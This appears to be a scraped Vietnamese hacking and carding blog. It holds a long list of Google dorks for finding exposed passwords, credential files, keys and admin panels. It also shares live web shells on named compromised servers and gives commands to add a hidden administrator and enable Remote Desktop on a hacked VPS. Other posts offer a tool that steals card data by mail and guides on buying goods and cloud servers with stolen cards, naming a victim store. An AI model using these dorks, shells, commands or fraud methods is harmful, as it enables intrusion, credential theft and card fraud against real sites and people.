inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000
-bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial
-download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial
-download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete"
"Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin
-site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session
with" OR intitle:"Data Frame - Browser not HTTP 1.1
compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news"
-demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID"
-site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform"
inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the
management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"
CuteNews" "2003..2005 CutePHP"
"
DWMail" password intitle:dwmail
"
Merak Mail Server Software" -.gov -.mil -.edu
-site:merakmailserver.com
"
Midmart Messageboard" "Administrator Login"
"
Monster Top List" MTL numrange:200-
"
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development
Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not
Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an
administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login"
-inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer
Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our
website. Please authenticate yourself to continue."
"You have requested to access the management functions"
-.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwt
hreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo")
-family
(intitle:"WmSC e-Cart
Administration")|(intitle:"WebMyStyle e-Cart
Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp)
-site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner
password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server
CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change
your password and user name. If new username is left
blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your
domain."
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server
Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE"
inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to
provide login account information for *" | "Please
provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration"
"Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log
in! You will have to accept cookies in order to log in"
-demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please
enter your User ID and Password in the spaces provided
below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel"
intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms
-inurl:asternic -inurl:sip -intitle:ANNOUNCE
-inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the
SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index")
-dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com"
inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have
cookies enabled in order to log into the site." ext:php
OR ext:cgi
intitle:"Merak Mail Server Web Administration"
-ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise"
-inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service
and a language."
intitle:"oMail-admin Administration - Login"
-inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin -
sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site
designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please
activate JavaScript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:"
inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for
authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login"
inurl:console
intitle:"Welcome Site/User Administrator" "Please select
the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N
Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite
inurl:admin
intitle:"XMail Web Administration Interface"
intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle"TrackerCam Live Video")|("TrackerCam
Application Login")|("Trackercam Remote")
-trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page |
inurl:sake.servlet
intitle:Group-Office "Enter your username and password
to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell,
Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcu
st)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin"
inurl:.php|.asp
nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc |
intitle:"Miva Merchant Administration Login"
-inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software Update
Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat |
intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe
XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS â?¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal
version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov
-edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql
21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurlPDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft ® Windows * ™ Version * DrWtsn32
Copyright ©" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum
vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox |
filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher"
inurl:"allsensors")|(intitle:"PRTG Traffic Grapher -
Monitoring Results")
(intitle:WebStatistica inurl:main.php) |
(intitle:"WebSTATISTICA server") -inurl:statsoft
-inurl:statsoftsa -inurl:statsoftinc.com -edu -software
-rob
(inurl:"robot.txt" | inurl:"robots.txt" )
intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url
ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
extdoc | pdf | xls | txt | ps | rtf | odt | sxw | psw
| ppt | pps | xml) (intext:confidential salary |
intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information
Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From"
+intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar
-site:sourceforge.net
filetype:pot inurl:john.pot
filetypeS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetypels -site:gov inurl:contact
filetypels inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intextpassword | passcode) intextusername | userid |
user) filetype:csv
intext:gmail invite
intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status |
inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project"
-site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator"
"2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system"
-site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php |
inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network
Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information
Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server
Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree
View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetypels
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new
mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
TUT up shell bằng tamper data
bạn cần cài tamper data tại đây
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
[RQ] Tổng Hợpl các Security của các Site....
Thân chào tất cả AE
Tình hình là qua 1 thời gian làm shipped mình đã thấy qua nhiều các dấu hiệu security ở các site. Nay mình xin post tất cả các icon đó lên để AE trao đổi và chia sẻ thêm kinh nghiệm cho mình, ví dụ như vô site nào có cái icon đó thì không nên ship hoặc là nên ship B=S or B#S. Mong Anh Em cùng nhau chia sẻ những hiểu biết của mình.
Note: nếu AE nào vô những site có các icon mới xin cứ post lên mình sẽ tổng hợp lên đây cho AE coi cho dễ. Icon sẽ được Update thường xuyên.
Sau đây là Security của các site và ICON của nó:
"This site protected by Trustwave's Trusted Commerce program"
"SSL Secure"
"Total Security Protection"
"Click for company profile"
"Verify Anonymous & Discreet"
"GeoTrust Payment Online Security"
"Security Shopping 256 Bits SSL v2/3"
"Accredited Bussiness" -------> Có cái này bỏ lun. 100% không qua.
"Secured by comodo"
"Easy Returns" ------> Gặp cái này mà có mail Ped cũng chưa chắc nhé... nó return lại đó, nhưng vẫn Ped được ^.^
" Secure Shopping" -----> gặp thằng này yên tâm, hàng nhái thôi hốt tới lun.
" The Sunday Times Fast Track"
"Safebuy Protecting The Consumer"
"Secured by RapidSSL 128 bit"
"Internet Shopping Is Safe"
"Internet Delivery Is Safe"
"Online Payment Service"
"Godaddy.com Verified & Secured"
"GetPrice Certified"
"Rated Store"
"Vefiry by Norton Secured"
"Unknown"
"McAfee Secure"
Nguồn VHU
Tình hình là qua 1 thời gian làm shipped mình đã thấy qua nhiều các dấu hiệu security ở các site. Nay mình xin post tất cả các icon đó lên để AE trao đổi và chia sẻ thêm kinh nghiệm cho mình, ví dụ như vô site nào có cái icon đó thì không nên ship hoặc là nên ship B=S or B#S. Mong Anh Em cùng nhau chia sẻ những hiểu biết của mình.
Note: nếu AE nào vô những site có các icon mới xin cứ post lên mình sẽ tổng hợp lên đây cho AE coi cho dễ. Icon sẽ được Update thường xuyên.
Sau đây là Security của các site và ICON của nó:
"This site protected by Trustwave's Trusted Commerce program" "SSL Secure" "Total Security Protection" "Click for company profile" "Verify Anonymous & Discreet"
"GeoTrust Payment Online Security"
"Security Shopping 256 Bits SSL v2/3"
"Accredited Bussiness" -------> Có cái này bỏ lun. 100% không qua.
"Secured by comodo"
"Easy Returns" ------> Gặp cái này mà có mail Ped cũng chưa chắc nhé... nó return lại đó, nhưng vẫn Ped được ^.^
" Secure Shopping" -----> gặp thằng này yên tâm, hàng nhái thôi hốt tới lun.
" The Sunday Times Fast Track"
"Safebuy Protecting The Consumer"
"Secured by RapidSSL 128 bit" 
"Internet Shopping Is Safe"
"Internet Delivery Is Safe"
"Online Payment Service"
"Godaddy.com Verified & Secured"
"GetPrice Certified"
"Rated Store"
"Vefiry by Norton Secured"
"Unknown"
"McAfee Secure"Nguồn VHU
Share shell sever 199.217.115.172
http://handbagsforsale.tk/wp-content...et/akismet.php
đã get root thành công
Chúng ta có 116 websites trên Server 199.217.115.172
đã get root thành công
Chúng ta có 116 websites trên Server 199.217.115.172
Thứ Ba, 20 tháng 11, 2012
Share Thủ Thuật Lấy Key Nis
I. Giới thiệu.
-X-Men Company đả vắn bóng một thời gian dài sao khi tung ra bản vá lổi Unicode Connection Controls - 1.0.26.
-X-Men Company chính thức giản tán vì những khó khăn. Có lẻ đây là một tin buồn.
-XHIntell là tên cho một khởi đầu mới. Sản phẩm đầu tiên của XHI là XHI Key
II. Sản phẩm
-Mục đích dùng để lấy Key NIS free từ server. Chỉ mất vài giây.
III. Cách dùng
1. Chạy.
3. Lấy Key và dùng.
Đã test thành công và được key 118 days nhé , mỗi ip get được 1 key thui nên các bạn đừng có ham hố nhé
Thanks
Nguồn VHU
TUT hack Vps Từ shell
đầu tiên execute command trên con shell đó >
l33t=username p4$sword=password
Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command
Sau đó thực hiện kết nối tới VPS
Nếu VPS một ip tĩnh nhưng không kết nối vào (mstsc) sử dụng các lệnh để cho phép người dùng từ xa:
net user l33t p4$sword /add l33t=username p4$sword=password
Code:
net localgroup administrators l33t /add
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /fCode:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f[Hàng độc] Ebank Modz Card 2012 4VN Group
4VN Group,...huyền thoại làm rung chuyển VTC một thời với những code lừa đảo chuyên nghiệp viết bằng AutoIT 
.Và e đã có nó trong tay 
Tính năng tự động gửi info thẻ VTC về mail của mình.Check mã thẻ và seri thẻ,nếu sai điều kiện sẽ không được chấp nhận
http://www.mediafire.com/?dew2krelxccbe17
.Và e đã có nó trong tay Tính năng tự động gửi info thẻ VTC về mail của mình.Check mã thẻ và seri thẻ,nếu sai điều kiện sẽ không được chấp nhận
http://www.mediafire.com/?dew2krelxccbe17
Thứ Hai, 19 tháng 11, 2012
[Share shell] sever 27.118.16.38
Chào các bạn,để góp phần cho ae học hỏi nên KunGa xin được mỗi ngày share 1 con shell cho ae nghịch
http://daithinh.vn/upload/images/logo_1283221177.php.swf
Vui lòng không kill shell cho ae cùng vọc nha
http://daithinh.vn/upload/images/logo_1283221177.php.swf
Chủ Nhật, 18 tháng 11, 2012
[CCV] Ship đèn giáng sinh, đủ loại.
Tình hình là giáng sinh sắp đến anh em ta cũng phải kiếm cái trang trí chứ nhỉ
Nguồn VHU
Nguyên liệu nha:
CCV
Mail gì chả được nhỉ.( em thì gmail thui)
giờ ah: các bác thích chiến h nào nhỉ tùy thui
shock: tùy các bác em chiến ip việt nam
tiếp là Bill chúng ta sẽ cho nó bằng ship
nói chung là qua là ped chủ yêu là bl cc thui
Đc85 biệt là cái site này nhiệt tình
Thui nói dài giòng quá cái này nạn nhân đây nè
hide kiếm ít thanks
http://www.environmentallights.com/
cho chút ảnh nè em ped rùi
Nguồn VHU
Nguyên liệu nha:
CCV
Mail gì chả được nhỉ.( em thì gmail thui)
giờ ah: các bác thích chiến h nào nhỉ tùy thui
shock: tùy các bác em chiến ip việt nam
tiếp là Bill chúng ta sẽ cho nó bằng ship
nói chung là qua là ped chủ yêu là bl cc thui
Đc85 biệt là cái site này nhiệt tình
Thui nói dài giòng quá cái này nạn nhân đây nè
hide kiếm ít thanks
http://www.environmentallights.com/
cho chút ảnh nè em ped rùi
report scam kubibmt
Nick diễn đàn : kubibmt
Yahoo : byg_kubi
LR : U9300333
nhận ship cho mình 2 con 4s bản lock giá 45% (drop của kubibmt luôn), drop của mình đang nhận hang khác nên kêu drop của kubi luôn, giá tổng là 190$, kêu mình đưa 90$ bên ngoài + 100$ add bank, mình thấy nick diễn đàn credit 2 nên cũng tin tưởng, đồng ý, giờ đã 2 tuần và không thấy tăm hơi đâu.
Proof
ngoài ra còn bảo mình gửi thêm 10$ để nhận hàng nhanh hơn
Quá buồn
Đây là 1 scammer anh em cẩn thận,hãy vào blog mình thường xuyên để biết thêm thông tin những tên scam để tránh đc những tình huống đáng tiếc
thân
KunGa
Yahoo : byg_kubi
LR : U9300333
nhận ship cho mình 2 con 4s bản lock giá 45% (drop của kubibmt luôn), drop của mình đang nhận hang khác nên kêu drop của kubi luôn, giá tổng là 190$, kêu mình đưa 90$ bên ngoài + 100$ add bank, mình thấy nick diễn đàn credit 2 nên cũng tin tưởng, đồng ý, giờ đã 2 tuần và không thấy tăm hơi đâu.
Proof
Quá buồn
Đây là 1 scammer anh em cẩn thận,hãy vào blog mình thường xuyên để biết thêm thông tin những tên scam để tránh đc những tình huống đáng tiếc
thân
KunGa
TUT - Đâm VPS Win/Linux UK
Nguyên liệu: CCV live là được, sock VN cũng reg được nhưng tốt nhất là trùng state.
Max cấu hình là 32GB RAM, 8 CPUs:
http://www.rackspace.com/
Có thể tạo được tối đa 10 VPS/ 1 account cloud.
Nó sẽ auto call đếnđọc 4 số PIN, nhập đúng 4 số đấy là activate được acc. Chỗ add CCV thì add con nào live là được, ko cần balance nhiều.
Sau khi activate acc, AE vào đây làm theo hướng dẫn của nó: Comment !
Nguồn VHU
Max cấu hình là 32GB RAM, 8 CPUs:
http://www.rackspace.com/
Có thể tạo được tối đa 10 VPS/ 1 account cloud.
Nó sẽ auto call đếnđọc 4 số PIN, nhập đúng 4 số đấy là activate được acc. Chỗ add CCV thì add con nào live là được, ko cần balance nhiều.
Sau khi activate acc, AE vào đây làm theo hướng dẫn của nó: Comment !
Nguồn VHU
Thứ Hai, 12 tháng 11, 2012
Hack Bằng Google
Thống kê những từ khóa tìm kiếm nguy hiểm trên google Sử dụng nó một cách hiệu quả bạn có thể dễ dàng deface một site Chúc các bạn may mắn
allinurl: "proxylist.txt"
allinurl: "proxy.txt"
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
for IIS server exlpoit
allinurl: winnt/system32/
and u ll get many IIS server exploits
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
